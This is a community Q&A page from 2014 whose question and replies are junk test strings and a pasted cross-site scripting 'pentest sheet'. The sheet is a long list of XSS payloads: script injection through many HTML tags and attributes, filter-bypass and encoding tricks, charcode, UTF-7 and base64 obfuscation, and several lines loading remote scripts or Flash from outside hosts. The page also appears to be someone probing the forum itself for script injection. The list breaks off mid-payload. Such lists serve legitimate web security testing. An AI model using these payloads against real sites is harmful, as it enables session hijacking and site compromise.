Question

''>/>'::'":>>?/.<?>>

  • Posted February 16, 2014

‘’>/>‘::’“:>>?/.<?>>‘’>?/>?./?.>>?>‘’‘’‘;;;;’”“”/poop

Subscribe
Share

Submit an answer
You can type!ref in this text area to quickly search our full set of tutorials, documentation & marketplace offerings and insert the link!

These answers are provided by our Community. If you find them useful, show some love by clicking the heart. If you run into issues leave a comment, or add your own answer to help others.

‘as’d’;;"//> <br><scr<script>ipt> shit

<scr<script>ipt>shit

<scr<script>ipt>

Information:
<br>A lot of people asked us regarding our cross site scripting pentest sheet for a fuzzer or own scripts. To have <br>some good results you can use the following list with automatic scripts, software or for manually pentesting. This <br>list goes out to all friends, nerds, pentester & exploiters. Please continue the List and we will update it soon. <br> <br>Note: This is a technical attack sheet for cross site penetrationtests. <br> <br> <br> <br>Cross Site Scripting Strings with TAG: <br> <br><meta http-equiv=“refresh” content=“0;url=javascript:document.cookie=true;”> <br><META HTTP-EQUIV=“Set-Cookie” Content=“USERID=<SCRIPT>document.cookie=true</SCRIPT>”> <br><SCRIPT>document.cookie=true;</SCRIPT> <br><IMG SRC=“jav ascript:document.cookie=true;”> <br><IMG SRC=“javascript:document.cookie=true;”> <br><IMG SRC="  javascript:document.cookie=true;“> <br><BODY onload!#$%&()~±_.,:;?@[/|]^=document.cookie=true;> <br><SCRIPT>document.cookie=true;//<</SCRIPT> <br><SCRIPT <B>document.cookie=true;</SCRIPT> <br><IMG SRC="javascript:document.cookie=true;"> <br><iframe src="javascript:document.cookie=true;> <br><SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT> <br></TITLE><SCRIPT>document.cookie=true;</SCRIPT> <br><INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;"> <br><BODY BACKGROUND="javascript:document.cookie=true;"> <br><BODY ONLOAD=document.cookie=true;> <br><IMG DYNSRC="javascript:document.cookie=true;"> <br><IMG LOWSRC="javascript:document.cookie=true;"> <br><BGSOUND SRC="javascript:document.cookie=true;"> <br><BR SIZE="&{document.cookie=true}"> <br><LAYER SRC="javascript:document.cookie=true;"></LAYER> <br><LINK REL="stylesheet" HREF="javascript:document.cookie=true;"> <br><STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting <br>¼script¾document.cookie=true;¼/script¾ <br><IFRAME SRC="javascript:document.cookie=true;"></IFRAME> <br><FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET> <br><TABLE BACKGROUND="javascript:document.cookie=true;"> <br><TABLE><TD BACKGROUND="javascript:document.cookie=true;"> <br><DIV STYLE="background-image: url(javascript:document.cookie=true;)"> <br><DIV STYLE="background-image: url(javascript:document.cookie=true;)"> <br><DIV STYLE="width: expression(document.cookie=true);"> <br><STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE> <br><IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)"> <br><CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)"> <br>exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'> <br><STYLE TYPE="text/javascript">document.cookie=true;</STYLE> <br><STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A> <br><STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE> <br><SCRIPT>document.cookie=true;</SCRIPT> <br><BASE HREF="javascript:document.cookie=true;//"> <br><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT> <br><XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <br><XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> <br><HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML> <br><? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?> <br><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4- <br><a href="javascript#document.cookie=true;"> <br><div onmouseover="document.cookie=true;"> <br><img src="javascript:document.cookie=true;"> <br><img dynsrc="javascript:document.cookie=true;"> <br><input type="image" dynsrc="javascript:document.cookie=true;"> <br><bgsound src="javascript:document.cookie=true;"> <br>&<script>document.cookie=true;</script> <br>&{document.cookie=true;}; <br><img src=&{document.cookie=true;};> <br><link rel="stylesheet" href="javascript:document.cookie=true;"> <br><img src="mocha:document.cookie=true;"> <br><img src="livescript:document.cookie=true;"> <br><a href="about:<script>document.cookie=true;</script>"> <br><body onload="document.cookie=true;"> <br><div style="background-image: url(javascript:document.cookie=true;);"> <br><div style="behaviour: url([link to code]);"> <br><div style="binding: url([link to code]);"> <br><div style="width: expression(document.cookie=true;);"> <br><style type="text/javascript">document.cookie=true;</style> <br><object classid="clsid:..." codebase="javascript:document.cookie=true;"> <br><style><!--</style><script>document.cookie=true;//--></script> <br><<script>document.cookie=true;</script> <br><script>document.cookie=true;//--></script> <br><!-- -- --><script>document.cookie=true;</script><!-- -- --> <br><img src="blah"onmouseover="document.cookie=true;"> <br><img src="blah>" onmouseover="document.cookie=true;"> <br><xml src="javascript:document.cookie=true;"> <br><xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml> <br><div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script> <br> <br> <br> <br>Cross Site Scripting Strings with close TAG: <br> <br>>"<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;"> <br>>"<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>"> <br>>"<SCRIPT>document.cookie=true;</SCRIPT> <br>>"<IMG SRC="jav ascript:document.cookie=true;"> <br>>"<IMG SRC="javascript:document.cookie=true;"> <br>>"<IMG SRC="  javascript:document.cookie=true;"> <br>>"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^=document.cookie=true;> <br>>“<SCRIPT>document.cookie=true;//<</SCRIPT> <br>>”<SCRIPT <B>document.cookie=true;</SCRIPT> <br>>“<IMG SRC=“javascript:document.cookie=true;”> <br>>”<iframe src=“javascript:document.cookie=true;> <br>>”<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT> <br>>“</TITLE><SCRIPT>document.cookie=true;</SCRIPT> <br>>”<INPUT TYPE=“IMAGE” SRC=“javascript:document.cookie=true;”> <br>>“<BODY BACKGROUND=“javascript:document.cookie=true;”> <br>>”<BODY ONLOAD=document.cookie=true;> <br>>“<IMG DYNSRC=“javascript:document.cookie=true;”> <br>>”<IMG LOWSRC=“javascript:document.cookie=true;”> <br>>“<BGSOUND SRC=“javascript:document.cookie=true;”> <br>>”<BR SIZE=“&{document.cookie=true}”> <br>>“<LAYER SRC=“javascript:document.cookie=true;”></LAYER> <br>>”<LINK REL=“stylesheet” HREF=“javascript:document.cookie=true;”> <br>>“<STYLE>li {list-style-image: url(“javascript:document.cookie=true;”);</STYLE><UL><LI>CrossSiteScripting <br>>“¼script¾document.cookie=true;¼/script¾ <br>>”<IFRAME SRC=“javascript:document.cookie=true;”></IFRAME> <br>>”<FRAMESET><FRAME SRC=“javascript:document.cookie=true;”></FRAMESET> <br>>“<TABLE BACKGROUND=“javascript:document.cookie=true;”> <br>>”<TABLE><TD BACKGROUND=“javascript:document.cookie=true;”> <br>>“<DIV STYLE=“background-image: url(javascript:document.cookie=true;)”> <br>>”<DIV STYLE=“background-image: url(javascript:document.cookie=true;)”> <br>>“<DIV STYLE=“width: expression(document.cookie=true);”> <br>>”<STYLE>@im\port’\ja\vasc\ript:document.cookie=true’;</STYLE> <br>>“<IMG STYLE=“CrossSiteScripting:expr/CrossSiteScripting/ession(document.cookie=true)”> <br>>”<CrossSiteScripting STYLE=“CrossSiteScripting:expression(document.cookie=true)”> <br>>"exp/<A STYLE='no\CrossSiteScripting:noCrossSiteScripting(”//“);CrossSiteScripting:ex/CrossSiteScripting////pression(document.cookie=true)'> <br>>”<STYLE TYPE=“text/javascript”>document.cookie=true;</STYLE> <br>>“<STYLE>.CrossSiteScripting{background-image:url(“javascript:document.cookie=true”);}</STYLE><A CLASS=CrossSiteScripting></A> <br>>”<STYLE type=“text/css”>BODY{background:url(“javascript:document.cookie=true”)}</STYLE> <br>>“<SCRIPT>document.cookie=true;</SCRIPT> <br>>”<BASE HREF=“javascript:document.cookie=true;//”> <br>>“<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT> <br>>”<XML ID=I><X><C><![CDATA[<IMG SRC=“javas]]<![CDATA[cript:document.cookie=true;”>]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <br>>“<XML ID=“CrossSiteScripting”><I><B><IMG SRC=“javascript:document.cookie=true”></B></I></XML><SPAN DATASRC=”#CrossSiteScripting" DATAFLD=“B” DATAFORMATAS=“HTML”></SPAN> <br>>“<HTML><BODY><?xml:namespace prefix=“t” ns=“urn:schemas-microsoft-com:time”><?import namespace=“t” implementation=”#default#time2"><t:set attributeName=“innerHTML” to=“CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>”></BODY></HTML> <br>>“<? echo(‘<SCR)’;echo(‘IPT>document.cookie=true</SCRIPT>’); ?> <br>>”<HEAD><META HTTP-EQUIV=“CONTENT-TYPE” CONTENT=“text/html; charset=UTF-7”> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4- <br>>“<a href=“javascript#document.cookie=true;”> <br>>”<div onmouseover=“document.cookie=true;”> <br>>“<img src=“javascript:document.cookie=true;”> <br>>”<img dynsrc=“javascript:document.cookie=true;”> <br>>“<input type=“image” dynsrc=“javascript:document.cookie=true;”> <br>>”<bgsound src=“javascript:document.cookie=true;”> <br>>“&<script>document.cookie=true;</script> <br>>”&{document.cookie=true;}; <br>>“<img src=&{document.cookie=true;};> <br>>”<link rel=“stylesheet” href=“javascript:document.cookie=true;”> <br>>“<img src=“mocha:document.cookie=true;”> <br>>”<img src=“livescript:document.cookie=true;”> <br>>“<a href=“about:<script>document.cookie=true;</script>”> <br>>”<body onload=“document.cookie=true;”> <br>>“<div style=“background-image: url(javascript:document.cookie=true;);”> <br>>”<div style=“behaviour: url([link to code]);”> <br>>“<div style=“binding: url([link to code]);”> <br>>”<div style=“width: expression(document.cookie=true;);”> <br>>“<style type=“text/javascript”>document.cookie=true;</style> <br>>”<object classid=“clsid:…” codebase=“javascript:document.cookie=true;”> <br>>“<style></script> <br>>”<<script>document.cookie=true;</script> <br>>“<script>document.cookie=true;//–></script> <br>>”<script>document.cookie=true;</script> <br>>“<img src=“blah"onmouseover=“document.cookie=true;”> <br>>”<img src=“blah>” onmouseover=“document.cookie=true;”> <br>>”<xml src=“javascript:document.cookie=true;”> <br>>“<xml id=“X”><a><b><script>document.cookie=true;</script>;</b></a></xml> <br>>”<div datafld=“b” dataformatas=“html” datasrc=“#X”></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script> <br> <br> <br> <br>Cross Site Scripting Strings with negative value & TAG: <br>-1<meta http-equiv=“refresh” content=“0;url=javascript:document.cookie=true;”> <br>-1<META HTTP-EQUIV=“Set-Cookie” Content=“USERID=<SCRIPT>document.cookie=true</SCRIPT>”> <br>-1<SCRIPT>document.cookie=true;</SCRIPT> <br>-1<IMG SRC=“jav ascript:document.cookie=true;”> <br>-1<IMG SRC=“javascript:document.cookie=true;”> <br>-1<IMG SRC="  javascript:document.cookie=true;“> <br>-1<BODY onload!#$%&()~±_.,:;?@[/|]^=document.cookie=true;> <br>-1<SCRIPT>document.cookie=true;//<</SCRIPT> <br>-1<SCRIPT <B>document.cookie=true;</SCRIPT> <br>-1<IMG SRC="javascript:document.cookie=true;"> <br>-1<iframe src="javascript:document.cookie=true;> <br>-1<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT> <br>-1</TITLE><SCRIPT>document.cookie=true;</SCRIPT> <br>-1<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;"> <br>-1<BODY BACKGROUND="javascript:document.cookie=true;"> <br>-1<BODY ONLOAD=document.cookie=true;> <br>-1<IMG DYNSRC="javascript:document.cookie=true;"> <br>-1<IMG LOWSRC="javascript:document.cookie=true;"> <br>-1<BGSOUND SRC="javascript:document.cookie=true;"> <br>-1<BR SIZE="&{document.cookie=true}"> <br>-1<LAYER SRC="javascript:document.cookie=true;"></LAYER> <br>-1<LINK REL="stylesheet" HREF="javascript:document.cookie=true;"> <br>-1<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting <br>-1¼script¾document.cookie=true;¼/script¾ <br>-1<IFRAME SRC="javascript:document.cookie=true;"></IFRAME> <br>-1<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET> <br>-1<TABLE BACKGROUND="javascript:document.cookie=true;"> <br>-1<TABLE><TD BACKGROUND="javascript:document.cookie=true;"> <br>-1<DIV STYLE="background-image: url(javascript:document.cookie=true;)"> <br>-1<DIV STYLE="background-image: url(javascript:document.cookie=true;)"> <br>-1<DIV STYLE="width: expression(document.cookie=true);"> <br>-1<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE> <br>-1<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)"> <br>-1<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)"> <br>-1exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'> <br>-1<STYLE TYPE="text/javascript">document.cookie=true;</STYLE> <br>-1<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A> <br>-1<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE> <br>-1<SCRIPT>document.cookie=true;</SCRIPT> <br>-1<BASE HREF="javascript:document.cookie=true;//"> <br>-1<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT> <br>-1<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <br>-1<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> <br>-1<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML> <br>-1<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?> <br>-1<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4- <br>-1<a href="javascript#document.cookie=true;"> <br>-1<div onmouseover="document.cookie=true;"> <br>-1<img src="javascript:document.cookie=true;"> <br>-1<img dynsrc="javascript:document.cookie=true;"> <br>-1<input type="image" dynsrc="javascript:document.cookie=true;"> <br>-1<bgsound src="javascript:document.cookie=true;"> <br>-1&<script>document.cookie=true;</script> <br>-1&{document.cookie=true;}; <br>-1<img src=&{document.cookie=true;};> <br>-1<link rel="stylesheet" href="javascript:document.cookie=true;"> <br>-1<img src="mocha:document.cookie=true;"> <br>-1<img src="livescript:document.cookie=true;"> <br>-1<a href="about:<script>document.cookie=true;</script>"> <br>-1<body onload="document.cookie=true;"> <br>-1<div style="background-image: url(javascript:document.cookie=true;);"> <br>-1<div style="behaviour: url([link to code]);"> <br>-1<div style="binding: url([link to code]);"> <br>-1<div style="width: expression(document.cookie=true;);"> <br>-1<style type="text/javascript">document.cookie=true;</style> <br>-1<object classid="clsid:..." codebase="javascript:document.cookie=true;"> <br>-1<style><!--</style><script>document.cookie=true;//--></script> <br>-1<<script>document.cookie=true;</script> <br>-1<script>document.cookie=true;//--></script> <br>-1<!-- -- --><script>document.cookie=true;</script><!-- -- --> <br>-1<img src="blah"onmouseover="document.cookie=true;"> <br>-1<img src="blah>" onmouseover="document.cookie=true;"> <br>-1<xml src="javascript:document.cookie=true;"> <br>-1<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml> <br>-1<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script> <br> <br> <br>Cross Site Scripting Strings Restriction Bypass Mail: <br> <br>>"<iframe src=http://vulnerability-lab.com/>@gmail.com <br>>"<script>alert(document.cookie)</script><div style="1@gmail.com <br>>"<script>alert(document.cookie)</script>@gmail.com <br> <br><iframe src=http://vulnerability-lab.com/>@gmail.com <br><script>alert(document.cookie)</script><div style="1@gmail.com <br><script>alert(document.cookie)</script>@gmail.com <br> <br> <br>Cross Site Scripting Strings Restriction Bypass Phone: <br>+49/>"<iframe src=http://vulnerability-lab.com>1337 <br>"><iframe src='' onload=alert('mphone')> <br><iframe src=http://vulnerability-lab.com>1337+1 <br> <br> <br>Cross Site Scripting Strings Restriction Bypass Obfuscation <br> <br>>“<ScriPt>ALeRt("VlAb")</scriPt> <br>>"<IfRaMe sRc=hTtp://vulnerability-lab.com></IfRaMe> <br> <br> <br>Cross Site Scripting Strings Restriction Bypass String to Charcode <br> <br><html><body> <br><button.onclick="alert(String.fromCharCode(60,115,99,114,105,112,116,62,97,108, <br>101,114,116,40,34,67,114,111,115,115,83,105,116,101,83,99,114,105,112,116,105,1 <br>10,103,64,82,69,77,79,86,69,34,41,60,47,115,99,114,105,112,116,62));">String:fr <br>om.Char.Code</button></body></html> <br> <br> <br>';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//\";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))</SCRIPT> <br>'';!--"<CrossSiteScripting>=&{()} <br> <br> <br> <br>Cross Site Scripting Strings Restriction Bypass encoded frame url <br> <br>%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%43%72%6F <br>%73%73%53%69%74%65%53%63%72%69%70%74%69%6E%67%32%22%29%3C%2F <br>%73%63%72%69%70%74%3E <br> <br> <br> <br>Cross Site Scripting Strings via Console: <br>set vlan name 1337 <script>alert(document.cookie)</script> <br>set system name <iframe src=http://www.vulnerability-lab.com> <br>set system location "><iframe src=a onload=alert("VL") < <br>set system contact <script>alert('VL')</script> <br> <br>insert <script>alert(document.cookie)</script> <br>add <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT>'"--> <br>add user <script>alert(document.cookie)</script> <script>alert(document.cookie)</script>@gmail.com <br> <br>add topic <iframe src=http://www.vulnerability-lab.com> <br>add name <script>alert('VL')</script> <br> <br>perl -e 'print "<IMG SRC=java\0script:alert(\"CrossSiteScripting\")>";' > out <br>perl -e 'print "<SCR\0IPT>alert(\"CrossSiteScripting\")</SCR\0IPT>";' > out <br> <br><!--[if gte IE 4]> <SCRIPT>alert('CrossSiteScripting');</SCRIPT> <![endif]--> <br> <br> <br> <br> <br>Cross Site Scripting Strings on per line validation applications: <br> <br><IMG <br>SRC <br>= <br>" <br>j <br>a <br>v <br>a <br>s <br>c <br>r <br>i <br>p <br>t <br>: <br>a <br>l <br>e <br>r <br>t <br>( <br>' <br>V <br>L <br>A <br>B <br>' <br>) <br>" <br>> <br> <br> <br> <br>Cross Site Scripting Strings Embed: <br> <br><EMBED SRC="http://vulnerability-lab.com/CrossSiteScripting.swf" AllowScriptAccess="always"></EMBED> <br> <br><EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> <br> <br><EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> <br> <br> <br> <br>Cross Site Scripting Strings Action Script: <br> <br> <object type="application/x-shockwave-flash" data="http://www.vulnerability-lab.com/hack.swf" width="300" height="300"> <br> <param name="movie" value="http://www.subhohalder.com/xysecteam.swf" /> <br> <param name="quality" value="high" /> <br> <param name="scale" value="noscale" /> <br> <param name="salign" value="LT" /> <br> <param name="allowScriptAccess" value="always" /> <br> <param name="menu" value="false" /> <br> </object> <br> <br> <br> <br> <br><SCRIPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT> <br><<SCRIPT>alert("CrossSiteScripting");//<</SCRIPT> <br><SCRIPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js?<B> <br><SCRIPT SRC=//vulnerability-lab.com/.js> <br><SCRIPT>a=/CrossSiteScripting/ alert(a.source)</SCRIPT> <br><SCRIPT a=">" SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT> <br><SCRIPT a=> SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT> <br><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT> <br></TITLE><SCRIPT>alert("CrossSiteScripting");</SCRIPT> <br> <br> <br><IMG SRC="javascript:alert('CrossSiteScripting');"> <br><IMG SRC=javascript:alert('CrossSiteScripting')> <br><IMG SRC=JaVaScRiPt:alert('CrossSiteScripting')> <br><IMG SRC=javascript:alert("CrossSiteScripting")> <br><IMG SRC=javascript:alert(“RM’CrossSiteScripting’”)> <br><IMG """><SCRIPT>alert("CrossSiteScripting")</SCRIPT>"> <br><IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <br><IMG SRC="jav ascript:alert('CrossSiteScripting');"> <br><IMG SRC="jav&#x09;ascript:alert('CrossSiteScripting');"> <br><IMG SRC="jav&#x0A;ascript:alert('CrossSiteScripting');"> <br><IMG SRC="jav&#x0D;ascript:alert('CrossSiteScripting');"> <br><IMG SRC="  javascript:alert('CrossSiteScripting');"> <br><IMG SRC="javascript:alert('CrossSiteScripting')" <br><IMG DYNSRC="javascript:alert('CrossSiteScripting')"> <br><IMG LOWSRC="javascript:alert('CrossSiteScripting')"> <br><IMG SRC='vbscript:msgbox("CrossSiteScripting")'> <br><IMG SRC="mocha:[code]"> <br><IMG SRC="livescript:[code]"> <br> <br> <br><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('CrossSiteScripting');"> <br><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <br><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('CrossSiteScripting');"> <br><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('CrossSiteScripting');"> <br><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <br><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=jAvAsCriPt:aLeRt('CroSsSiteScrIpting');"> <br><META HTTP-EQUIV="Link" Content="<http://vulnerability-lab.com/CrossSiteScripting.css>; REL=stylesheet"> <br><META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('CrossSiteScripting')</SCRIPT>"> <br><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('CrossSiteScripting');+ADw-/SCRIPT+AD4- <br> <br> <br><OBJECT TYPE="text/x-scriptlet" DATA="http://vulnerability-lab.com/scriptlet.html"></OBJECT> <br><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('CrossSiteScripting')></OBJECT> <br> <br> <br><STYLE>@im\port'\ja\vasc\ript:alert("CrossSiteScripting")';</STYLE> <br><STYLE>@import'http://vulnerability-lab.com/CrossSiteScripting.css';</STYLE> <br><STYLE TYPE="text/javascript">alert('CrossSiteScripting');</STYLE> <br><STYLE>.CrossSiteScripting{background-image:url("javascript:alert('CrossSiteScripting')");}</STYLE><A CLASS=CrossSiteScripting></A> <br><STYLE type="text/css">BODY{background:url("javascript:alert('CrossSiteScripting')")}</STYLE> <br><STYLE>li {list-style-image: url("javascript:alert('CrossSiteScripting')");}</STYLE><UL><LI>CrossSiteScripting <br><STYLE>BODY{-moz-binding:url("http://vulnerability-lab.com/CrossSiteScriptingmoz.xml#CrossSiteScripting")}</STYLE> <br> <br> <br><DIV STYLE="background-image: url(javascript:alert('CrossSiteScripting'))"> <br><DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <br><DIV STYLE="background-image: url(javascript:alert('CrossSiteScripting'))"> <br><DIV STYLE="width: expression(alert('CrossSiteScripting'));"> <br> <br><LAYER SRC="http://vulnerability-lab.com/script.html"></LAYER> <br><LINK REL="stylesheet" HREF="javascript:alert('CrossSiteScripting');"> <br><LINK REL="stylesheet" HREF="http://vulnerability-lab.com/CrossSiteScripting.css"> <br> <br><BODY BACKGROUND="javascript:alert('CrossSiteScripting')"> <br><BODY ONLOAD=alert('CrossSiteScripting')> <br><BODY onload!#$%&()*~+-_.,:;?@[/|\]^=alert(“CrossSiteScripting”)> <br><iframe src=http://vulnerability-lab.com/index.html < <br> <br> <br><TABLE BACKGROUND=“javascript:alert(‘CrossSiteScripting’)”> <br><TABLE><TD BACKGROUND=“javascript:alert(‘CrossSiteScripting’)”> <br> <br><BGSOUND SRC=“javascript:alert(‘CrossSiteScripting’);”> <br><BR SIZE=“&{alert(‘CrossSiteScripting’)}”> <br> <br> <br><A HREF=“http://server.com/”>CrossSiteScripting</A> <br><A HREF=“http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D”>CrossSiteScripting</A> <br><A HREF=“http://1113982867/”>CrossSiteScripting</A> <br><A HREF=“javascript:document.location=‘http://www.vulnerability-lab.com/’”>CrossSiteScripting</A> <br> <br><BASE HREF=“javascript:alert(‘CrossSiteScripting’);//”> <br> <br>";alert(‘CrossSiteScripting’);// <br> <br><INPUT TYPE=“IMAGE” SRC=“javascript:alert(‘CrossSiteScripting’);”> <br> <br> <br> <br> <br><CrossSiteScripting STYLE=“behavior: url(CrossSiteScripting.htc);”> <br> <br> <br>¼script¾alert(¢CrossSiteScripting¢)¼/script¾ <br> <br> <br> <br><IMG STYLE=“CrossSiteScripting:expr/CrossSiteScripting/ession(alert(‘CrossSiteScripting’))”> <br><CrossSiteScripting STYLE=“CrossSiteScripting:expression(alert(‘CrossSiteScripting’))”> exp/<A STYLE='no\CrossSiteScripting:noCrossSiteScripting(”//“); CrossSiteScripting:ex/CrossSiteScripting////pression(alert(“CrossSiteScripting”))'> <br> <br> <br> <br> <br> <br>a=“get”; <br>b=“URL(””; <br>c=“javascript:”; <br>d=“alert(‘CrossSiteScripting’);”)“; <br>eval(v+l+a+b); <br> <br><HTML xmlns:CrossSiteScripting> <br> <?import namespace=“CrossSiteScripting” implementation=“http://ha.ckers.org/CrossSiteScripting.htc”> <br> CrossSiteScripting:CrossSiteScriptingCrossSiteScripting</CrossSiteScripting:CrossSiteScripting> <br> <br><XML ID=I><X><C><![CDATA[<IMG 